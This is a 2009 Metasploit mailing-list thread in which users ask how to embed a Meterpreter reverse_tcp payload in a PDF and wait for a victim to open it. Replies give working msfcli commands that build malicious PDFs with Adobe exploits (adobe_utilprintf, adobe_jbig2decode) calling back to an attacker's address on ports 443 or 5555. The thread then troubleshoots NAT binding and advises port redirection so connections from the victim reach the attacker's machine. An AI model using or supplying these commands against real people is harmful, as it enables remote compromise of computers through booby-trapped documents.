is it possible to attach metasploit payloads withpdf

[danuxx at gmail.com (NeZa)]

Hey,

Bind LHOST to your local ip y.y.y.y .

And the trick is in the x.x.x.x host, you need to to a redirection
port so when getting incoming connections (from victim) to x.x.x.x:443
you redirect to y.y.y.y:443, this is also another way of NAT so you do
not need to take care of switching form internal to external ip's this
is handled automatically by the redirection port software.

My 2 cents.

On Sun, Mar 29, 2009 at 4:05 PM,  <wfdawson at bellsouth.net> wrote:
> ?Yes, I am running it as root.? The "problem" would appear to be that my
> call to msfcli cannot bind to the x.x.x.x address as that is not my
> interface's actual address.? My address is y.y.y.y which is NAT'ed to
> x.x.x.x.? I should not care about that from my side.? The client can
> certainly connect to x.x.x.x which then is connected to me by NAT...
>
> -------------- Original message from Natron <natron at invisibledenizen.org>:
> --------------
>
>
> > Are you running it as root? You can't bind to 443 on a 'normal' account.
> >
> > N
> >
> > On Mar 29, 2009, at 3:14 PM, wfdawson at bellsouth.net wrote:
> >
> > > Hi,
> > >
> > > I tried your suggestion. I have a NAT'ed connection to the Internet
> > > where connections to my external address are mapped one-to-one to my
> > > internal address. With the following:
> > >
> > > ./msfcli exploit/windows/fileformat/adobe_jbig2decode
> > > filename=test2.pdf payload=windows/meterpreter/reverse_tcp
> > > LHOST=x.x.x.x LPORT=443 E
> > >
> > > ...where x.x.x.x is my actual Internet visible IP address, I
> > > obtained the following response:
> > >
> > > [*] Please wait while we load the module tree...
> > > [*] Handler binding to LHOST 0.0.0.0
> > > [-] Bind failed on 0.0.0.0
> > > [*] Handler binding to LHOST x.x.x.x
> > > [-] Bind failed on x.x.x.x
> > > [-] Exploit failed: Cannot assign requested address - bind(2)
> > >
> > > Is there a way to make this work in my situation?
> > >
> > >
> > > -------------- Original message from Mirko Iodice
> > > : --------------
> > >
> > >
> > > > try:
> > > >
> > > > ./msfcli exploit/windows/fileformat/adobe_utilprintf
> > > > filename=document.pdf payload=windows/meterpreter/reverse_tcp
> > > > lhost=x.x.x.x lport=5555 E
> > > >
> > > > 2009/3/28 Abhishek Kumar :
> > > > > hi list,
> > > > >
> > > > > yesterday i was working around attaching a meterpreter reverse_tcp
> > > > > payload to a MS word document.
> > > > > It was simple to do because msfpayload provides payloads in VBA
> > > format.
> > > > > Now,the question is...
> > > > > is there anything available for pdf files ? > can we embed our
> > > payloads with pdf and then wait for the user to click on it
> > > > ??
> > > > > regards
> > > > > abhi
> > > > > _______________________________________________
> > > > > https://mail.metasploit.com/mailman/listinfo/framework
> > > >
> > > >
> > > >
> > > > --
> > > > Mirko Iodice
> > > > _______________________________________________
> > > > https://mail.metasploit.com/mailman/listinfo/framework
> > > _______________________________________________
> > > https://mail.metasploit.com/mailman/listinfo/framework
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework



-- 
Daniel Regalado aka NeZa
Hacker Wanna Be from Nezahualcoyotl

www.macula-group.com